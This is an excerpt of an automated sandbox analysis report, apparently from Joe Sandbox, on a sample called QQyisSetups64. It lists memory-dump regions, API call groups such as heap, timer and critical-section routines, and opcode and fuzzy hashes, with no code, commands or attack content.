                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575482323.0000000002CA1000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_2c80000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ErrorLast$EventSelectsend
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 259408233-0
                                                                                                                                                                                                                      • Opcode ID: 790858b6ab8531cfb1a2640e49c60aee20dac41b0b06f232719c1df8c5acb3fc
                                                                                                                                                                                                                      • Instruction ID: 32157a1b091fe9811aaf2c6ca4ee21969b0cbe39e35106583fb1e6f470b5973b
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 790858b6ab8531cfb1a2640e49c60aee20dac41b0b06f232719c1df8c5acb3fc
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4D114CB6600B409BD320AB79D888A57B6E9FBC8B18F414A2DEA57C3690D771E5409B50
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2574280796.0000000002880000.00000040.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_2880000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3016257755-0
                                                                                                                                                                                                                      • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                                                                                                                                                      • Instruction ID: 6d595d1d5f919cb74844ab2beb272ef5c06662e265a015b22e6ae2a300a47d27
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DD112E3A04414EBBCF166E88CC158ED3F23BF28254F988915FE1899430D73AD571EB81
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3016257755-0
                                                                                                                                                                                                                      • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                                                                                                                                                      • Instruction ID: 66c78ba46513717e56f922f808f386da4b06c1c14e8a6e3630a8b752fd876efb
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B9118C3600014EBFDF169E84EC56CEE3F6BBB18250F488656FA1858130C736C5B1AB81
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2575068878.0000000002C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575013434.0000000002C80000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575240447.0000000002C95000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575309576.0000000002C99000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575391810.0000000002C9F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575482323.0000000002CA1000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_2c80000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3016257755-0
                                                                                                                                                                                                                      • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                                                                                                                                                      • Instruction ID: 431296fc96daaff45656c437579f7b6ad015197716d3bde7bcaa2d32701bb897
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D3114E3604014AFBCF126E84CC518EE3F23BB49358F898419FA1859930D336C6B1AB81
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578011375.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3600000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3016257755-0
                                                                                                                                                                                                                      • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                                                                                                                                                      • Instruction ID: 85b95536d3a1714bd745ae8a136c62b82970a670ba49ae16bf80b49b22c8d7f0
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9B11897600014EBBCF129F94CD55CEE3F22BB18254F0C8418FE285A230C336C5B2AB81
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • __getptd.LIBCMT ref: 0288D9A1
                                                                                                                                                                                                                        • Part of subcall function 028898E6: __getptd_noexit.LIBCMT ref: 028898E9
                                                                                                                                                                                                                        • Part of subcall function 028898E6: __amsg_exit.LIBCMT ref: 028898F6
                                                                                                                                                                                                                      • __amsg_exit.LIBCMT ref: 0288D9C1
                                                                                                                                                                                                                      • __lock.LIBCMT ref: 0288D9D1
                                                                                                                                                                                                                      • _free.LIBCMT ref: 0288DA01
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2574280796.0000000002880000.00000040.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_2880000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: __amsg_exit$__getptd__getptd_noexit__lock_free
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3170801528-0
                                                                                                                                                                                                                      • Opcode ID: dcfced8234ba75e6e02d5464e1e82598378604a0c6e90570ba5556207cf73916
                                                                                                                                                                                                                      • Instruction ID: bc04d010f42f00f7dc2139ac1e108abeffafcef9eea73ae6296603908f2359b8
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dcfced8234ba75e6e02d5464e1e82598378604a0c6e90570ba5556207cf73916
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C6016D3E905621DBDB21BF78C884769B7A2BF04715F154005E804EB2D0DB34A951CFD7
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • __getptd.LIBCMT ref: 03614250
                                                                                                                                                                                                                        • Part of subcall function 0361381A: __getptd_noexit.LIBCMT ref: 0361381D
                                                                                                                                                                                                                        • Part of subcall function 0361381A: __amsg_exit.LIBCMT ref: 0361382A
                                                                                                                                                                                                                      • __amsg_exit.LIBCMT ref: 03614270
                                                                                                                                                                                                                      • __lock.LIBCMT ref: 03614280
                                                                                                                                                                                                                      • _free.LIBCMT ref: 036142B0
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578011375.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3600000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: __amsg_exit$__getptd__getptd_noexit__lock_free
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3170801528-0
                                                                                                                                                                                                                      • Opcode ID: 5ef467ea6fd3a6922cde44d000b760b61804c61db5949c02be97e0f772367ebf
                                                                                                                                                                                                                      • Instruction ID: 8aa204ac4491830b3715adb5b675b60a805e54655f1b883ea97da4cfe305867c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5ef467ea6fd3a6922cde44d000b760b61804c61db5949c02be97e0f772367ebf
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D8015E35D01761ABDB22EF668844759F7B0AF057A0F5D4109E8146B390CB3459A2CBDD
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(03784FB5,03784E55,037842BE,00000000,?,?,03784E55,?,?,?,?,00000000,000000FF), ref: 037841E8
                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(03784FB5,?,?,?,00000000,000000FF), ref: 037841F6
                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(03784FB5), ref: 03784257
                                                                                                                                                                                                                      • SetEvent.KERNEL32(8520468B), ref: 03784272
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CriticalSection$Leave$EnterEvent
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3394196147-0
                                                                                                                                                                                                                      • Opcode ID: 4523d13377f7656bf6466c8943904b1f11cfa07a3511922c0ab302a4bd64d844
                                                                                                                                                                                                                      • Instruction ID: 857fffc76d8b7312da4b5e1d8ac235efe1756274290c05c096bb4846486417d1
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4523d13377f7656bf6466c8943904b1f11cfa07a3511922c0ab302a4bd64d844
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3B1115B0605B059FD728DF75D588AD6B7E9BF88300B15C96DE45E87211EB35E801CB00
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • timeGetTime.WINMM(00000001,?,00000001,?,03783C4F,?,?,00000001), ref: 03784B15
                                                                                                                                                                                                                      • InterlockedIncrement.KERNEL32(00000001), ref: 03784B24
                                                                                                                                                                                                                      • InterlockedIncrement.KERNEL32(00000001), ref: 03784B31
                                                                                                                                                                                                                      • timeGetTime.WINMM(?,03783C4F,?,?,00000001), ref: 03784B48
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: IncrementInterlockedTimetime
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 159728177-0
                                                                                                                                                                                                                      • Opcode ID: 95cbc43be65496a3bcc6191f5dee66f5529fb8f7d0e55ef136e5127bc3e425b0
                                                                                                                                                                                                                      • Instruction ID: 37966fa4543f68567603205516ef7d2017ce0a4a92dd7e2d1b13136498f157c4
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 95cbc43be65496a3bcc6191f5dee66f5529fb8f7d0e55ef136e5127bc3e425b0
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C401C8B56007059FC720EF6AD88094AFBECAF98650700892AE549C7611E674E5448FA0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • timeGetTime.WINMM(00000001,?,00000001,?,02C83C4F,?,?,00000001), ref: 02C84AF5
                                                                                                                                                                                                                      • InterlockedIncrement.KERNEL32(00000001), ref: 02C84B04
                                                                                                                                                                                                                      • InterlockedIncrement.KERNEL32(00000001), ref: 02C84B11
                                                                                                                                                                                                                      • timeGetTime.WINMM(?,02C83C4F,?,?,00000001), ref: 02C84B28
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2575068878.0000000002C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575013434.0000000002C80000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575240447.0000000002C95000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575309576.0000000002C99000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575391810.0000000002C9F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575482323.0000000002CA1000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_2c80000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: IncrementInterlockedTimetime
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 159728177-0
                                                                                                                                                                                                                      • Opcode ID: 2dbf0173a2e878a9a4a76d8981d7811482ee4b2649050b1662b78346d103fede
                                                                                                                                                                                                                      • Instruction ID: 29a822c817e464a0c57c4a6a7c354ce476dc1e5e47cd148900efed0cc8d84c8f
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2dbf0173a2e878a9a4a76d8981d7811482ee4b2649050b1662b78346d103fede
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CA01DAB5A007059FC721EF7AD880A5AFBF9AF58754740892EE549C7600E774E6448FE0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • CreateWaitableTimerW.KERNEL32(00000000,00000000,00000000), ref: 03783667
                                                                                                                                                                                                                      • _free.LIBCMT ref: 0378369C
                                                                                                                                                                                                                        • Part of subcall function 0378F639: RtlFreeHeap.NTDLL(00000000,00000000,?,03793E4C,00000000,?,03794500,00000000,00000001,00000000,?,03798DE6,00000018,037A6448,0000000C,03798E76), ref: 0378F64F
                                                                                                                                                                                                                        • Part of subcall function 0378F639: GetLastError.KERNEL32(00000000,?,03793E4C,00000000,?,03794500,00000000,00000001,00000000,?,03798DE6,00000018,037A6448,0000000C,03798E76,00000000), ref: 0378F661
                                                                                                                                                                                                                      • _malloc.LIBCMT ref: 037836D7
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 037836E5
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CreateErrorFreeHeapLastTimerWaitable_free_malloc_memset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3340475617-0
                                                                                                                                                                                                                      • Opcode ID: db3a4e1adaa563edad9699f04dbbd8798812986cf8836ce7d692194509d33a69
                                                                                                                                                                                                                      • Instruction ID: 76c1814f3ede0ae6878e71fe4cace249e666bbf7063836745b27ff89d124fbb3
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: db3a4e1adaa563edad9699f04dbbd8798812986cf8836ce7d692194509d33a69
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6F01DAF5940B04DFE360EF7AD885B97BBE9EB85254F148C2ED5AE87301D635A8058F20
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • CreateWaitableTimerW.KERNEL32(00000000,00000000,00000000), ref: 02C83667
                                                                                                                                                                                                                      • _free.LIBCMT ref: 02C8369C
                                                                                                                                                                                                                        • Part of subcall function 02C86E49: HeapFree.KERNEL32(00000000,00000000,?,02C89900,00000000,?,02C89FB0,00000000,00000001,00000000,?,02C8C0CF,00000018,02C97C70,0000000C,02C8C15F), ref: 02C86E5F
                                                                                                                                                                                                                        • Part of subcall function 02C86E49: GetLastError.KERNEL32(00000000,?,02C89900,00000000,?,02C89FB0,00000000,00000001,00000000,?,02C8C0CF,00000018,02C97C70,0000000C,02C8C15F,00000000), ref: 02C86E71
                                                                                                                                                                                                                      • _malloc.LIBCMT ref: 02C836D7
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 02C836E5
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2575068878.0000000002C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575013434.0000000002C80000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575240447.0000000002C95000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575309576.0000000002C99000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575391810.0000000002C9F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575482323.0000000002CA1000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_2c80000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CreateErrorFreeHeapLastTimerWaitable_free_malloc_memset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3340475617-0
                                                                                                                                                                                                                      • Opcode ID: 21fb21d618a5aa4071b63d544a29c636425bb92ded2beb255252dcf52687bd30
                                                                                                                                                                                                                      • Instruction ID: 292483d33c0c741c81d1cf62c7e4b049e9477629fa9a27ffbd426ab6ac982d25
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 21fb21d618a5aa4071b63d544a29c636425bb92ded2beb255252dcf52687bd30
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6A01C8F1900B449FE3209F7AD881B97BAE9FB85358F10882ED5AE83301D630A9048F60
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • _malloc.LIBCMT ref: 02886F08
                                                                                                                                                                                                                        • Part of subcall function 02886E5A: __FF_MSGBANNER.LIBCMT ref: 02886E73
                                                                                                                                                                                                                        • Part of subcall function 02886E5A: __NMSG_WRITE.LIBCMT ref: 02886E7A
                                                                                                                                                                                                                      • std::exception::exception.LIBCMT ref: 02886F3D
                                                                                                                                                                                                                      • std::exception::exception.LIBCMT ref: 02886F57
                                                                                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 02886F68
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2574280796.0000000002880000.00000040.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_2880000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: std::exception::exception$Exception@8Throw_malloc
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2388904642-0
                                                                                                                                                                                                                      • Opcode ID: 1e9301e5085f9c58ec7a0ab4f7fc891bb570a668ba91a7db57855d99bd873ef8
                                                                                                                                                                                                                      • Instruction ID: fc04166981fb44731eadcc56615230745e672efc00e8bdbd07cdc6c9219650f8
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1e9301e5085f9c58ec7a0ab4f7fc891bb570a668ba91a7db57855d99bd873ef8
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 56F0A43E4042A9A6DB05FB68CC84AAD7AFFEB41714F640059D428DA0D1FBB1DAC1CB56
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • _malloc.LIBCMT ref: 0360F0E0
                                                                                                                                                                                                                        • Part of subcall function 0360F032: __FF_MSGBANNER.LIBCMT ref: 0360F04B
                                                                                                                                                                                                                        • Part of subcall function 0360F032: __NMSG_WRITE.LIBCMT ref: 0360F052
                                                                                                                                                                                                                      • std::exception::exception.LIBCMT ref: 0360F115
                                                                                                                                                                                                                      • std::exception::exception.LIBCMT ref: 0360F12F
                                                                                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 0360F140
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578011375.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3600000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: std::exception::exception$Exception@8Throw_malloc
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2388904642-0
                                                                                                                                                                                                                      • Opcode ID: b08fdf8cb5e3b65abb6e8e2bd981c9ae2de8ac343fbf2f6e0fd6789c4a68690e
                                                                                                                                                                                                                      • Instruction ID: 8c80e33812df64305e664b70f98dc572c3d87fca7abe3c8984cc33453e245385
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b08fdf8cb5e3b65abb6e8e2bd981c9ae2de8ac343fbf2f6e0fd6789c4a68690e
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 78F02D358003146BDB29EB54DD259BF7B6DDB40644F94446CD4019E1D0DB718A02CB41
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 03781420: HeapFree.KERNEL32(?,00000000,?,?,?,037840B1,?,00000000,03784039,?,771ADFA0,03783648), ref: 0378143D
                                                                                                                                                                                                                        • Part of subcall function 03781420: _free.LIBCMT ref: 03781459
                                                                                                                                                                                                                      • HeapDestroy.KERNEL32(00000000), ref: 0378CD93
                                                                                                                                                                                                                      • HeapCreate.KERNEL32(?,?,?), ref: 0378CDA5
                                                                                                                                                                                                                      • _free.LIBCMT ref: 0378CDB5
                                                                                                                                                                                                                      • HeapDestroy.KERNEL32 ref: 0378CDE2
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Heap$Destroy_free$CreateFree
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 4097506873-0
                                                                                                                                                                                                                      • Opcode ID: 1e1abc803247464b6f3bb0420f0a0d998ec74a3a95256ff2480d6bce5cfcf313
                                                                                                                                                                                                                      • Instruction ID: 4c8494fb464b486f35ecd322f859c6fb392ec72cb91fca1fc6e6c374795b0b79
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1e1abc803247464b6f3bb0420f0a0d998ec74a3a95256ff2480d6bce5cfcf313
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9BF037B9200B02ABD310EF24E808B53FBB8FF84714F158918E85997684DB34E851CBA0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 02C81420: HeapFree.KERNEL32(?,00000000,?,?,?,02C840B1,?,00000000,02C84039,?,771ADFA0,02C83648), ref: 02C8143D
                                                                                                                                                                                                                        • Part of subcall function 02C81420: _free.LIBCMT ref: 02C81459
                                                                                                                                                                                                                      • HeapDestroy.KERNEL32(00000000), ref: 02C864A3
                                                                                                                                                                                                                      • HeapCreate.KERNEL32(?,?,?), ref: 02C864B5
                                                                                                                                                                                                                      • _free.LIBCMT ref: 02C864C5
                                                                                                                                                                                                                      • HeapDestroy.KERNEL32 ref: 02C864F2
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2575068878.0000000002C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575013434.0000000002C80000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575240447.0000000002C95000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575309576.0000000002C99000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575391810.0000000002C9F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575482323.0000000002CA1000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_2c80000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Heap$Destroy_free$CreateFree
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 4097506873-0
                                                                                                                                                                                                                      • Opcode ID: 0a9d888a0594945ee7e19fded0b1e5f48cdf477137a27741001871651be64c73
                                                                                                                                                                                                                      • Instruction ID: 4ede459c6da88a020462d018707807b741fd149e4be6f4d4e2831d4890d279c9
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0a9d888a0594945ee7e19fded0b1e5f48cdf477137a27741001871651be64c73
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A7F037B5500702ABE720EF25E808B17B7F9FF84758F24891CE85997240DB34E865CBE0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2574280796.0000000002880000.00000040.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_2880000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 865245655-0
                                                                                                                                                                                                                      • Opcode ID: 9534965ccca21370a2365faca07fc43a5bbbcb8b41f594eb418147c089430495
                                                                                                                                                                                                                      • Instruction ID: 58034561d21913577e5b6159048283e7fc4610aa266dc08a348e090aba91de69
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9534965ccca21370a2365faca07fc43a5bbbcb8b41f594eb418147c089430495
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D5F0907C400204EBC704BFB4CC48D2EBBAAAF89345325C858E909CB315EB35D402CFA2
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578011375.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3600000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 865245655-0
